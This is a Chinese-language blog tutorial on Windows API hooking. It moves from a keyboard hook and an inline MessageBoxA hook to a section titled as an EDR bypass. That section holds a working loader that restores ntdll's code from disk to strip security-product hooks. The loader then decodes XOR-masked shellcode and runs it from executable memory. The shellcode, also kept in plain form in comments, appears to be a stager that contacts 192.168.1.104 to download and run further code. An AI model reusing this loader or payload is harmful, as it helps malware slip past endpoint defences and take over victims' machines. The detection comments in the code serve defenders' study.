Windows API hook技术

Windows API hook技术

A.什么叫挂钩?

钩子技术即指“给特定的函数挂上钩子,让函数在执行前先执行被挂的钩子”,从而达到拦截事件和函数调用的目的。挂钩子的本质是一个程序段。

为了方便理解,我们首先实现一个简单的keyboard挂钩

hookDLL.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <string>
#include <Windows.h>
#include <iostream>
#include <fstream>
using namespace std;
// DLL entry point.  The hook DLL keeps no per-process or per-thread state,
// so every attach/detach reason leads to the same outcome: report success to
// the loader and do nothing else.
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    (void)hModule;
    (void)ul_reason_for_call;
    (void)lpReserved;
    return TRUE;
}
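// Hook procedure that the installer registers with SetWindowsHookEx.
// The installer resolves it with GetProcAddress(hookdll, "KeyboardProc"),
// which only succeeds if the symbol is exported under that exact name
// (a .def file or an unmangled dllexport) — neither is visible in this
// listing, so verify it in the project settings.
//
// code           : hook code supplied by the system; per the HOOKPROC
//                  contract a negative value must be passed straight on to
//                  CallNextHookEx without processing.
// wParam, lParam : forwarded unchanged to the next hook in the chain.
// Returns the value of CallNextHookEx so later hooks still run.
//
// The duplicate prototype that preceded this definition (missing its ';')
// did not compile and has been removed.
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam) {
    if (code < 0) {
        // Not ours to handle: hand the event on untouched.
        return CallNextHookEx(NULL, code, wParam, lParam);
    }
    {
        // Scoped so the stream is flushed and closed before the chain call.
        // ofstream truncates on open, so the file only ever holds the marker
        // written by the most recent event.
        ofstream text("c:\\programdata\\hook.txt");
        text << "HOOK";
    }
    return CallNextHookEx(NULL, code, wParam, lParam);
}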

  hookexe.cpp

// installhook.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include <iostream>

#include <windows.h>
#include <strsafe.h>

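// Loads the hook DLL, resolves its exported hook procedure and registers it
// as a low-level keyboard hook.  Each step that can fail is checked and the
// GetLastError() code is printed, so a failure no longer ends in
// SetWindowsHookEx being handed a NULL procedure.  The hook is released and
// the DLL unloaded before returning; the program exits immediately after
// registration, so the hook exists only for the lifetime of this process.
// Returns 0 on success, 1 if any step failed.
int main()
{
    static HINSTANCE hookdll;
    hookdll = LoadLibrary(TEXT("C:\\Users\\localhost\\Desktop\\hook\\keyboradProcHook\\x64\\Release\\keyboradProcHook.dll"));
    if (hookdll == NULL) {
        std::cout << "LoadLibrary failed: " << GetLastError() << '\n';
        return 1;
    }

    // Lookup by name requires the DLL to export "KeyboardProc" unmangled.
    HOOKPROC keybords = (HOOKPROC)GetProcAddress(hookdll, "KeyboardProc");
    if (keybords == NULL) {
        std::cout << "GetProcAddress failed: " << GetLastError() << '\n';
        FreeLibrary(hookdll);
        return 1;
    }

    static HHOOK hhook;
    hhook = SetWindowsHookEx(
        WH_KEYBOARD_LL,
        keybords,
        hookdll,
        0);
    if (hhook == NULL) {
        std::cout << "SetWindowsHookEx failed: " << GetLastError() << '\n';
        FreeLibrary(hookdll);
        return 1;
    }
    std::cout << "Hello World!\n";

    // Tear the hook down explicitly instead of relying on process exit.
    UnhookWindowsHookEx(hhook);
    FreeLibrary(hookdll);
    return 0;
}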

B.通过HookedMessageBox进一步了解hook技术

这里是 https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++ 的源代码

#include "pch.h"
#include <iostream>
#include <Windows.h>

// Address of user32!MessageBoxA, resolved in main() and read back by
// HookedMessageBox when it restores the original bytes.
FARPROC messageBoxAddress = NULL;
// Byte count reported by WriteProcessMemory; shared by main() and the hook.
SIZE_T bytesWritten = 0;
// The first 6 bytes of MessageBoxA saved before patching — the size of the
// "push imm32; ret" sequence that overwrites them.
char messageBoxOriginalBytes[6] = {};

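// Replacement for user32!MessageBoxA installed by main().  The signature and
// calling convention match MessageBoxA so the "push <addr>; ret" trampoline
// lands here with the caller's arguments intact.
//
// Logs the intercepted text and caption, restores the saved original bytes
// over the trampoline (making the hook one-shot: later calls reach user32
// directly unless main() patches again), then forwards to the real
// MessageBoxA and returns its result.
int __stdcall HookedMessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) {

	// print intercepted values from the MessageBoxA function.  Both strings
	// may legitimately be NULL for MessageBoxA, and streaming a null char*
	// is undefined behaviour, so print a marker instead.
	std::cout << "Ohai from the hooked function\n";
	std::cout << "Text: " << (lpText ? lpText : "(null)")
	          << "\nCaption: " << (lpCaption ? lpCaption : "(null)") << std::endl;

	// unpatch MessageBoxA: the saved prologue must be back in place before
	// calling through, otherwise the call below would re-enter this hook.
	WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, messageBoxOriginalBytes, sizeof(messageBoxOriginalBytes), &bytesWritten);

	// call the original MessageBoxA, forwarding the owner window instead of
	// dropping it (passing NULL detached the box from the caller's window).
	return MessageBoxA(hWnd, lpText, lpCaption, uType);
}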

// Demonstrates the inline hook: shows MessageBoxA untouched, overwrites its
// first 6 bytes with a "push <HookedMessageBox>; ret" trampoline, then calls
// it again so the trampoline diverts execution into HookedMessageBox.
//
// From a detection standpoint the observable behaviour is a process reading
// and then writing the executable code of its own user32.dll through
// Read/WriteProcessMemory.  None of LoadLibraryA, GetProcAddress or the two
// memory calls have their results checked, so a failure goes unreported.
int main()
{
	// show messagebox before hooking
	MessageBoxA(NULL, "hi", "hi", MB_OK);

	// user32 is already loaded by the call above; this just yields its handle
	HINSTANCE library = LoadLibraryA("user32.dll");
	SIZE_T bytesRead = 0;

	// get address of the MessageBox function in memory
	messageBoxAddress = GetProcAddress(library, "MessageBoxA");

	// save the first 6 bytes of the original MessageBoxA function - will need for unhooking
	ReadProcessMemory(GetCurrentProcess(), messageBoxAddress, messageBoxOriginalBytes, 6, &bytesRead);

	// create a patch "push <address of new MessageBoxA); ret"
	// 0x68 = push imm32, 0xC3 = ret.  Only 4 bytes of the pointer are copied,
	// so this is correct for a 32-bit build only; in a 64-bit build the upper
	// half of the address is dropped — confirm the target platform.
	void* hookedMessageBoxAddress = &HookedMessageBox;
	char patch[6] = { 0 };
	memcpy_s(patch, 1, "\x68", 1);
	memcpy_s(patch + 1, 4, &hookedMessageBoxAddress, 4);
	memcpy_s(patch + 5, 1, "\xC3", 1);

	// patch the MessageBoxA
	WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, patch, sizeof(patch), &bytesWritten);

	// show messagebox after hooking
	MessageBoxA(NULL, "hi", "hi", MB_OK);

	return 0;
}

  通过disam反汇编发现,确实在第二次调用MessageBoxA的时候执行了我们的函数

 

 

 

我们尝试分析hook过程

MessageBoxA函数位于用户层的user32.dll中,所以我们先从user32.dll中找到MessageBoxA的地址

 

 

 然后读取当前进程内存空间中MessageBoxA地址处的前6个字节,留作后面unhook时使用

 

 

 然后构造用来写入自身内存的指令(push; ret):

push ret

 

 

 然后就是修改内存空间,

 

 

 这是修改后的MessageBoxA

 

 

 

 

 

 进入HookedMessageBox后

 

 

 

 

 

 

 C.通过杀软特性实战bypass EDR

一般来说ntdll是用户层与内核层之间的最后一道防线,很多杀软在进行拦截时都会hook ntdll里面的一些函数,这里讨论的情况是如何bypass它

一幅图简单明了

 

 

 前提是ntdll已经被hook了 当然如果没hook最好(:

#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>
#include <stdio.h>
/* length: 798 bytes */
//unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4
e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78";
unsigned char buf[] = "\xfd\xe9\x88\x1\x1\x1\x61\x88\xe4\x30\xd3\x65\x8a\x53\x31\x8a\x53\xd\x8a\x53\x15\x8a\x73\x29\xe\xb6\x4b\x27\x30\xfe\x30\xc1\xad\x3d\x60\x7d\x3\x2d\x21\xc0\xce\xc\x0\xc6\xe3\xf1\x53\x56\x8a\x53\x11\x8a\x43\x3d\x0\xd1\x8a\x41\x79\x84\xc1\x75\x4b\x0\xd1\x51\x8a\x49\x19\x8a\x59\x21\x0\xd2\xe2\x3d\x48\x8a\x35\x8a\x0\xd7\x30\xfe\x30\xc1\xad\xc0\xce\xc\x0\xc6\x39\xe1\x74\xf5\x2\x7c\xf9\x3a\x7c\x25\x74\xe3\x59\x8a\x59\x25\x0\xd2\x67\x8a\xd\x4a\x8a\x59\x1d\x0\xd2\x8a\x5\x8a\x0\xd1\x88\x45\x25\x25\x5a\x5a\x60\x58\x5b\x50\xfe\xe1\x59\x5e\x5b\x8a\x13\xea\x87\x5c\x69\x6f\x64\x75\x1\x69\x76\x68\x6f\x68\x55\x69\x4d\x76\x27\x6\xfe\xd4\x30\xfe\x56\x56\x56\x56\x56\x69\x3b\x57\x78\xa6\xfe\xd4\xe8\x85\x1\x1\x1\x5a\x30\xc8\x50\x50\x6b\x2\x50\x50\x69\x51\x1\x1\x1\x52\x51\x69\x56\x88\x9e\xc7\xfe\xd4\xea\x71\x5a\x30\xd3\x53\x69\x1\x3\x41\x85\x53\x53\x53\x52\x53\x51\x69\xea\x54\x2f\x3a\xfe\xd4\x88\xc7\x82\xc2\x51\x30\xfe\x56\x56\x6b\xfe\x52\x57\x69\x2c\x7\x19\x7a\xfe\xd4\x84\xc1\xe\x85\xc2\x0\x1\x1\x30\xfe\x84\xf7\x75\x5\x88\xf8\xea\x8\x69\xab\xc4\xe3\x5c\xfe\xd4\x88\xc0\x69\x44\x20\x5f\x30\xfe\xd4\x30\xfe\x56\x6b\x6\x50\x57\x51\x69\xb6\x56\xe1\xa\xfe\xd4\xbe\x1\x2e\x1\x1\x38\xc6\x75\xb6\x30\xfe\xe8\x90\x0\x1\x1\xe8\xc8\x0\x1\x1\xe9\x8a\xfe\xfe\xfe\x2e\x65\x42\x51\x64\x1\xb2\x9c\xe6\x19\xb4\x91\xc2\xb5\xcd\x2e\x69\xe0\x59\xff\x31\x34\x41\x11\x33\x29\xbf\x57\x97\x5\x33\x45\x36\xdd\x84\x9a\xb5\x58\xc0\xbb\xcf\xfb\x14\xd9\x12\xe2\x17\x95\xfc\x6b\xe1\x81\xc1\xc9\x10\xbe\x80\x91\x67\xe7\xea\xa7\x4e\x94\x8\xb5\x6c\x27\x18\x68\xcb\xc0\xe9\x7d\x89\xf4\x3e\xda\x39\x1\x54\x72\x64\x73\x2c\x40\x66\x64\x6f\x75\x3b\x21\x4c\x6e\x7b\x68\x6d\x6d\x60\x2e\x34\x2f\x31\x21\x29\x62\x6e\x6c\x71\x60\x75\x68\x63\x6d\x64\x3a\x21\x4c\x52\x48\x44\x21\x38\x2f\x31\x3a\x21\x56\x68\x6f\x65\x6e\x76\x72\x21\x4f\x55\x21\x37\x2f\x30\x3a\x21\x56\x4e\x56\x37\x35\x3a\x21\x55\x73\x68\x65\x64\x6f\x75\x2e\x34\x2f\x31\x3a\x21\x43\x4e\x48\x44\x38\x3a\x44\x4f\x54\x52\x28\xc\xb\x1\x27\xa5\xe\x77\x5d\xbf\xd5\x23\x
da\x5c\xbe\xb1\x4\x19\xd1\x95\x42\xc6\xcf\x5e\x81\x95\x69\xb4\x46\xc3\xde\x28\xe4\x2d\x72\xb7\xfa\x85\x7c\x41\xdc\xac\xe\xc3\x71\x9b\x6f\xa5\xde\x65\x2e\xa0\x34\xfb\xca\x53\xb0\x87\x81\x8a\x52\x64\xff\x77\x9a\x1c\xf2\x34\xf4\xe9\xfd\xf3\xda\x9a\xf2\x8\x3d\x6f\x24\xd1\x5b\x2d\x9a\xe2\xf3\xb\x5b\xe5\x0\xad\xbd\x3a\x8a\xbc\x28\x5f\xf0\x4c\xf2\x13\xc\x4f\x3b\xaa\x2e\x1d\x97\x4\x78\x39\x1e\x7f\x96\x9\x14\xe4\x14\xfc\x25\x0\x32\x4c\x4e\x38\x22\x9\x45\xcf\x92\x28\x9a\xa4\xef\x25\xb6\xe8\x2d\x8c\xa9\xd3\xa6\x2d\x88\x85\xb\xd4\xca\xcd\x26\xb\x34\xaf\x5d\x47\xe1\xbb\x52\x2f\x82\xfc\xdb\xfd\xfd\xa9\xd6\xda\x71\x9f\xdf\xab\xec\x60\x6b\x7b\xd4\xde\xf4\x7\x9e\xf4\x2e\x10\x56\x6f\xa6\x62\x2f\x36\x52\x31\x97\xd4\xca\xbb\x61\x84\x26\x64\x2d\x78\xa2\x36\x4e\xae\x66\x14\xe\x90\xab\x7b\x1\x69\xf1\xb4\xa3\x57\xfe\xd4\x6b\x41\x69\x1\x11\x1\x1\x69\x1\x1\x41\x1\x56\x69\x59\xa5\x52\xe4\xfe\xd4\x92\xb8\x1\x1\x1\x1\x0\xd8\x50\x52\x88\xe6\x56\x69\x1\x21\x1\x1\x52\x57\x69\x13\x97\x88\xe3\xfe\xd4\x84\xc1\x75\xc7\x8a\x6\x0\xc2\x84\xc1\x74\xe4\x59\xc2\xe9\xa8\xfc\xfe\xfe\x30\x38\x33\x2f\x30\x37\x39\x2f\x30\x2f\x30\x31\x35\x1\x13\x35\x57\x79";
// Replaces the in-memory .text section of ntdll.dll with the bytes of a
// fresh SEC_IMAGE mapping of the on-disk file, which discards any inline
// hooks a security product placed there.  Nothing is returned and no
// failure is reported.
//
// Detection/mitigation notes: the sequence CreateFileA on
// system32\ntdll.dll -> CreateFileMapping(SEC_IMAGE) -> VirtualProtect of
// ntdll's .text to PAGE_EXECUTE_READWRITE -> memcpy over it is highly
// characteristic; it is what hook-integrity checks look for and what ACG
// (linked at the end of the post) is designed to block.
void unhook() {
	HANDLE process = GetCurrentProcess();   // pseudo-handle, not a real handle
	MODULEINFO mi = {};
	HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");

	// Result unchecked: on failure mi.lpBaseOfDll stays NULL and the header
	// walk below dereferences it.
	GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
	LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
	// None of the next three results is validated; an invalid file or
	// mapping handle ends in a NULL ntdllMappingAddress read by the memcpy.
	HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	// SEC_IMAGE lays the file out as the loader would, so section RVAs taken
	// from the loaded copy index straight into this view.
	HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
	LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

	// Walk the section table of the *loaded* ntdll to locate .text.
	PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

	for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
		PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

		// Name is an 8-byte field that is not guaranteed to be NUL-terminated;
		// strcmp can read past it for an 8-character section name.
		if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
			DWORD oldProtection = 0;
			// isProtected is assigned but never tested: if VirtualProtect
			// fails, the memcpy below writes into non-writable code and faults.
			bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
			// Overwrite the whole loaded .text with the clean copy.
			memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
			// Restore the previous protection; result ignored again.
			isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
		}
	}

	CloseHandle(process);       // no-op on the GetCurrentProcess pseudo-handle
	CloseHandle(ntdllFile);
	CloseHandle(ntdllMapping);  // the view itself is never passed to UnmapViewOfFile — leaks until exit
	FreeLibrary(ntdllModule);   // GetModuleHandleA added no reference, so this release is unmatched

}
// Decodes the XOR-masked payload in buf into executable memory and hands it
// to a thread-pool wait callback, after stripping user-mode hooks from ntdll
// with unhook().  Declared to return 0, but see the final wait below.
//
// Detection notes: a PAGE_EXECUTE_READWRITE VirtualAlloc followed by a
// thread-pool callback whose address lies inside that private allocation
// rather than in a loaded image is the observable behaviour of this code.
int main()
{
	unhook();
		// Stored into an unsigned char below, so only the low byte of 1025
		// (0x01) takes part in the XOR.
		int password = 1025;
	unsigned char deShellCode[1000];   // uninitialised; only nLen bytes are ever written
	int nLen = sizeof(buf) - 1;        // no check that nLen <= sizeof(deShellCode)
		for (int i = 0; i < nLen; i++)
	{
		deShellCode[i] = buf[i] ^ password;
		printf("\\x%x", deShellCode[i]);   // echoes every decoded byte to stdout
	}

	// Auto-reset event created already signalled, so the wait registered
	// below is satisfiable at once.
	HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
	LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(deShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	unhook();   // second call; the one at the top already did the same work
	// Copies the entire 1000-byte buffer, including the uninitialised tail
	// beyond nLen, into the executable region.
	RtlMoveMemory(shellcodeAddress, deShellCode, sizeof(deShellCode));

	PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);
	SetThreadpoolWait(threadPoolWait, event, NULL);
	// Presumably keeps the process alive while the callback runs on a pool
	// thread: whichever waiter consumes the auto-reset event first wins, and
	// if that is the pool this wait never returns — confirm.
	WaitForSingleObject(event, INFINITE);

	return 0;
}
//#include <stdio.h>
//#include <Windows.h>
//
///* length: 798 bytes */
//unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4
e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78";
//
//
//int main(int argc, char* argv[])
//{
//	int password = 1025;
//	unsigned char enShellCode[1000];
//	unsigned char deShellCode[1000];
//	int nLen = sizeof(buf) - 1;
//
//	for (int i = 0; i < nLen; i++)
//	{
//		enShellCode[i] = buf[i] ^ password;
//		printf("\\x%x", enShellCode[i]);
//	}
//
//	printf("\n");
//
//	/*for (int i = 0; i < nLen; i++)
//	{
//		deShellCode[i] = enShellCode[i] ^ password;
//		printf("\\x%x", deShellCode[i]);
//	}*/
//
//	system("pause");
//	return 0;
//}

D.总结

当然,这次只是提到了一种unhook的手法,还有很多种,比如 https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher 以及 ACG: https://www.countercraftsec.com/blog/post/arbitrary-vs-kernel/

也可以直接发起syscall,从而完全不经过被hook的API;当然这些都是早已被玩烂的手法,只是体力活而已

参考

